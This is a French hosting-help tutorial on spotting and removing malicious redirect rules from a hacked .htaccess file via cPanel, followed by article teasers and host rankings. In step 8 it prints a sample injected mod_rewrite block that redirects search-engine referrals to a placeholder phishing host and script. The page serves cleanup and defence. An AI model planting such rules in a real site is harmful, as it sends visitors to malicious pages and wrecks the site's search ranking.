Comment nettoyer un .htaccess hacké


, Mis à jour le 18 février, 2015

Comment nettoyer un .htaccess hacké

Dans cet article nous allons discuter de mesures que vous pouvez prendre pour nettoyer et réparer un fichier .htaccess piraté.

Le fichier .htaccess est utilisé pour configurer principalement des règles pour contrôler la façon dont on accède à votre site.

Vous ne remarquerez peut-être pas que votre fichier .htaccess a été piraté jusqu'à ce qu'une enquête manuelle soit menée, ou jusqu'à ce que vous obteniez un avertissement de logiciels malveillants qui vous dit que votre site est redirigé vers un site malveillant.

Parfois, vous pouvez voir dans la barre d'état de votre navigateur Internet qu'un site Web étranger tente de charger du contenu sur votre site Web, ou vous remarquerez peut-être un avertissement dans votre navigateur Web.

Tous peuvent être des signes communs d'un hack du fichier .htaccess, vous pourriez remarquer également que vous avez perdu votre position dans le classement des moteurs de recherche.

C'est un cas typique où les pirates vont tenter de pirater votre fichier .htaccess de sorte que lorsque les robots des moteurs de recherche explorent votre site, ils sont redirigés vers le site Web que le pirate a mis en place au lieu du vôtre.

Vous pouvez faire un contrôle rapide depuis l'extérieur à l'aide de l'outil de Diagnostic Google pour savoir s'ils ont détecté quelque chose de malveillant sur votre site dans leur plus récente analyse.

Remplacez tout simplement VotreDomaine.com par votre vrai nom de domaine dans l'URL suivante:

http://google.com/safebrowsing/diagnostic?site=VotreDomaine.com

Vous pouvez en lire plus sur la page Outil de diagnostic Google.

Les étapes à suivre pour nettoyer le fichier .htacesss

En suivant les étapes ci-dessous vous pouvez apprendre à détecter un hack de .htaccess et à nettoyer votre fichier .htaccess si vous en détecter un.

Étape 1. Connectez-vous à cPanel

Étape 2. Sous la section Fichiers, cliquez sur Gestionnaire de Fichiers.

 gestionnaire de fichier dans cPanel

Étape 3. Sélectionnez l'option "Dossier Racine pour:" et sélectionnez votre domaine dans le menu déroulant.

 répertoire principal dans gestionnaire de fichier cpanel

Étape 4. Assurez-vous que "Montrer les fichiers cachés" est sélectionné

Étape 5. Cliquez sur "Allez"

Étape 6. Clique droit sur le fichier .htaccess et cliquez sur 'Éditer'

 ouvrir et editer un fichier .htaccess

Étape7. Vous pourriez avoir une fenêtre de dialogue qui vous propose de choisir l'encodage, cliquez sur "Edit" simplement

Étape 8. Défilez de haut en bas pour voir si un bout de code semble suspect; de toute manière vous verrez très probablement quelque chose de ce genre:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://SiteHameconnage.tld/fichier_hack.php?t=3 [R,L]
</IfModule>

Ce que ce code de réécriture essaie de faire c'est de vérifier le référent d'une requête, si c'est un moteur de recherche populaire, il le redirige vers leur site SiteHameconnage.tld et essaie de charger un script malicieux fichier_hack.php.

Parce que ces instructions conditionnelles RewriteCond ne  s’appliqueraient pas à vous, et seulement aux moteurs de recherche, ce genre de hacks peut passer sous l’incognito pendant longtemps. Et le plus longtemps ils sont actifs, le plus ils affectent votre classement dans les moteurs de recherche.

Étape9. Pour supprimer ces instructions malicieuses de réécriture, vous pouvez simplement mettre en surbrillance tout le texte et appuyer 'Supp' sur votre clavier et par la suite cliquer sur "Enregistrer les modifications" sur le coin droit du haut du fichier.

Si vous n'êtes pas certains à 100% d'avoir affaire à un code malicieux de redirection, nous vous recommandons de sauvegarder votre fichier .htaccess avant de l'éditer. Pour ce faire il suffit de faire un clic-droit sur le fichier .htaccess à l'intérieur du Gestionnaire de Fichiers et de cliquer sur Copier et ensuite choisir le chemin de copie comme /public_html/.htaccess-BAK, et finalement cliquer sur Copie de Fichier(s).

Vous devez maintenant avoir compris comment trouver et éliminer un hack du fichier .htaccess qui pourrait causer des redirections malicieuses sur votre site. Vous serez très certainement intéressé de lire à propos des "Étapes à suivre après une attaque : cas de Wordpress" pour plus d'information sur comment empêcher les attaques et sécuriser votre cPanel.


comments powered by Disqus

Installation OpenVPN sur Centos

Installation OpenVPN sur Centos

L’une des manières les plus sûres d’envoyer des données sur internet est via un VPN, aussi connu sous le nom de « Virtual Private Network ». Lorsque l’on utilise un VPN, les données sont encryptées et envoyées à travers un réseau virtuel privé qui utilise un réseau public (internet par exemple).  Ce … Continuer

Publié le 22 mars, 2015

1 Commentaires
Protection de cPanel par géolocalisation

Protection de cPanel par géolocalisation

Les administrateurs de sites web sont constamment à la recherche de techniques qui leur permettraient de se débarrasser des mauvaises requêtes qui atteignent sans arrêt leur serveur. S’ils peuvent  s’occuper des visiteurs malveillants et les bannir définitivement le plus rapidement possible, cela la … Continuer

Publié le 7 mars, 2015

0 Commentaires
Comment installer Configserver sur un serveur cPanel

Comment installer Configserver sur un serveur cPanel

Vous venez de créer votre tout premier VPS ou serveur dédié, et vous êtes impatients de commencer à installer votre logiciel, avoir des utilisateurs cPanel et faire de la revente d’hébergement. En bref vous n’attendez qu’une chose : vous mettre au travail. Pas si vite ! Avant tout, vous devez effect … Continuer

Publié le 29 décembre, 2014

2 Commentaires
Comment sécuriser votre serveur cPanel

Comment sécuriser votre serveur cPanel

La sécurité du serveur est quelque chose qui ne devrait jamais être négligé. Un jour ou l'autre, il y a des chances que votre serveur soit l'objet d'attaques et que l'intégrité de vos données soit à risque, sans mentionner que vous risquez de perdre des clients potentiels et existants dans le même t … Continuer

Publié le 26 décembre, 2014

0 Commentaires
Comment utiliser le gestionnaire de fichiers cPanel

Comment utiliser le gestionnaire de fichiers cPanel

Le gestionnaire de fichiers vous permet de gérer votre site via HTTP plutôt qu’avec un outil FTP ou toute autre application tierce. Vous pouvez télécharger, créer ou supprimer des fichiers, organiser les fichiers en dossiers et de modifier les permissions des fichiers. Même s'il n'est pas aussi soph … Continuer

Publié le 18 octobre, 2013

0 Commentaires
Comment bloquer une IP dans cPanel

Comment bloquer une IP dans cPanel

De nos jours, le nombre d’araignées du Web  (robots d’indexation) malveillants ne cesse d’augmenter. Ces robots ont comme objectif de collecter les emails et les failles des sites web pour organiser des attaques par la suite. À chaque fois qu’ils visitent un site web, ils puisent dans les ressources … Continuer

Publié le 14 septembre, 2013

0 Commentaires
Installation extensions Frontpage

Installation extensions Frontpage

Ce tutoriel va vous montrer comment installer les extensions FrontPage dans cPanel Les extensions serveur FrontPage sont utilisées par: Microsoft FrontPage Microsoft Visual Studio 2003 Microsoft Visual Studio 2006 Microsoft Visual Studio 2008 Microsoft Expressions Web a également la possib … Continuer

Publié le 26 août, 2013

0 Commentaires
Comment rediriger une URL dans cPanel

Comment rediriger une URL dans cPanel

L'outil de redirections dans cPanel vous permet de rediriger les visiteurs de votre site à partir d'une URL source vers une URL cible. Attention: ne jamais créer une redirection pour domaine.com à www.domaine.com ou de domain.com à domain.com/index. En utlilisant l’une ou l’autre, vous risquez de p … Continuer

Publié le 27 juillet, 2013

0 Commentaires



Les avis des clients

Avis des utilisateurs


Faites entendre votre voix. Passez en revue votre fournisseur d'hébergement Web - bon ou mauvais.


Je suis très content de vos services et désire poursuivre avec vous dans le long termes. Nous aimons particulièrement la personalisation de vos services. Merci Martin Labonté

Martin Labonté à propos Centerserv France

Montrer une autre revue
Lire les avis Centerserv France



Plans d'hébergement




Les plans d'hébergement de 59 sociétés d'hébergement partout dans le monde


Meilleur hébergeurs web

# hébergeur web prix action

1

Ikoula

1.95 EURO

Ajouter un Avis
Visiter

2

Siteground

6.95 USD

Ajouter un Avis
Visiter

3

Ex2hosting

3.99 EURO

Ajouter un Avis
Visiter

4

Inmotion

5.95 USD

Ajouter un Avis
Visiter

5

Webhostinghub

4.95 USD

Ajouter un Avis
Visiter

6

Bluehost

6.95 USD

Ajouter un Avis
Visiter






Hébergeurs par avis de clients

Ex2hosting
78 avis des clients
Nuxit France
70 avis des clients
Hostpapa France
67 avis des clients
1and1 France
62 avis des clients
Rapidenet
50 avis des clients
Ajouter un avis Tous les profils


Hébergeurs par fidélité de clients

Ex2hosting
73 / 78 recommandé
Nuxit France
68 / 70 recommandé
Rapidenet
49 / 50 recommandé
Infomaniak France
48 / 48 recommandé
Hostpapa France
39 / 67 recommandé
Évaluer hébergeur Tous les profils


Question de la Semaine


Le plus important critère de votre hébergeur



Contacter l'éditeur

Posez votre question